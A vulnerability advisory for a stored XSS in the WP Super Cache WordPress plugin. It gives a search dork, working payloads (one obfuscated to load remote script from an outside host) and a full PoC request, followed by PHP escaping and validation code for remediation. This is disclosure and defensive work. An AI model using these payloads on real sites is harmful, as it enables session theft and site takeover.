/*!
 - # VULNERABILITY: WP Super Cache WordPress Plugin <= 1.7.2 - Authenticated Persistent XSS
 - # GOOGLE DORK: inurl:/wp-content/plugins/wp-super-cache/
 - # DATE: 2021-03-23
 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
 - # VENDOR: Automattic [ https://automattic.com ]
 - # SOFTWARE VERSION: <= 1.7.2
 - # SOFTWARE LINK: https://ru.wordpress.org/plugins/wp-super-cache/
 - # CVSS: AV:N/AC:L/PR:H/UI:R/S:C
 - # CWE: CWE-79
 - # CVE: CVE-2021-24329
*/

### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the WP Super Cache plugin through v1.7.2 for WordPress.
[i] Vulnerable parameter(s): &wp_cache_location=.
[i] This vulnerability also affects other plugins that display diagnostic/debug information and some security plugins.

### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

### -- [ Payloads: ]

[$] ";' onmouseover=alert(document.cookie); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0;
[$] ";' onmouseover=eval(atob(`eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp`)); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0;

### -- [ PoC | Authenticated Persistent XSS | Cache Location: ]

[!]
POST /wp-admin/options-general.php?page=wpsupercache&tab=settings HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 773
Cookie: [admin cookies]

_wpnonce=c6b9540023&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fexample.com%2Fwp-content%2Fcache%2F%22%3B%27+onmouseover%3Deval%28atob%28%60eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp%60%29%29%3B+style%3Dposition%3Afixed%3Bwidth%3A100%25%3Bheight%3A100%25%3Bmargin%3A0%3Bpadding%3A0%3Bleft%3A0%3Btop%3A0%3B+&_wpnonce=c6b9540023

### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
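The root cause behind the Info and PoC sections above is a stored option value (wp_cache_location) written back into an HTML attribute on the settings page without escaping, so a value containing `";'` closes the attribute and the remainder becomes new attributes on the element. As an added example, not code from WP Super Cache, from Automattic, or from the advisory author, the PHP below shows that rendering pattern beside an escaped rendering and a save-time validator. The function names, the regular expression, and the use of htmlspecialchars() in place of WordPress's esc_attr() are assumptions made for this example; the advisory does not show the plugin's code or its patch.

```php
<?php
// Added example, not the plugin's code. Function names and the allow-list
// regex are illustrative assumptions; the advisory shows neither the
// plugin's rendering code nor the vendor's fix.

// Vulnerable rendering pattern: the saved option is concatenated straight
// into value="...". A value containing `";'` terminates the attribute and
// the rest of the string is parsed as further attributes (onmouseover=...,
// style=...) on the <input>, which is the stored-XSS condition (CWE-79).
function render_location_field_unsafe(string $saved_value): string
{
    return '<input type="text" name="wp_cache_location" value="'
        . $saved_value . '" />';
}

// Hardened rendering: htmlspecialchars() with ENT_QUOTES converts ", ', <, >
// and & to entities, so the stored value can no longer close the attribute.
// In WordPress the equivalent output escaper is esc_attr() (assumed
// equivalent for this purpose).
function render_location_field_safe(string $saved_value): string
{
    $escaped = htmlspecialchars($saved_value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="wp_cache_location" value="'
        . $escaped . '" />';
}

// Defence in depth at save time: a cache directory path never legitimately
// contains quotes, whitespace, backticks or angle brackets. This constructed
// allow-list accepts only an absolute path built from path-safe characters
// and ending in a slash; anything else is rejected so it is never stored.
// Returning null lets the caller keep the previous setting and log the event.
function validate_cache_location(string $submitted): ?string
{
    $path = trim($submitted);
    if (!preg_match('#^/[A-Za-z0-9._/\-]+/$#', $path)) {
        return null;
    }
    return $path;
}

// Test input: the first payload from the advisory, appended to a cache path
// the way the PoC request does (decoded from its URL-encoded form).
$payload = '/var/www/example.com/wp-content/cache/";\' onmouseover=alert(document.cookie); '
    . 'style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0;';

// Unsafe rendering: the injected onmouseover/style attributes survive into the page.
echo render_location_field_unsafe($payload), PHP_EOL;

// Safe rendering: the quotes are entity-encoded and the value is inert text.
echo render_location_field_safe($payload), PHP_EOL;

// Validation: the payload is refused, a normal cache path is accepted.
var_dump(validate_cache_location($payload));
var_dump(validate_cache_location('/var/www/example.com/wp-content/cache/'));
```

Output escaping is the control that closes the vulnerability class regardless of where the value came from; the save-time validator only narrows what can be stored and is worth pairing with a log entry, since a rejected value of this shape on an admin settings form is itself a useful detection signal for an abused or compromised administrator account.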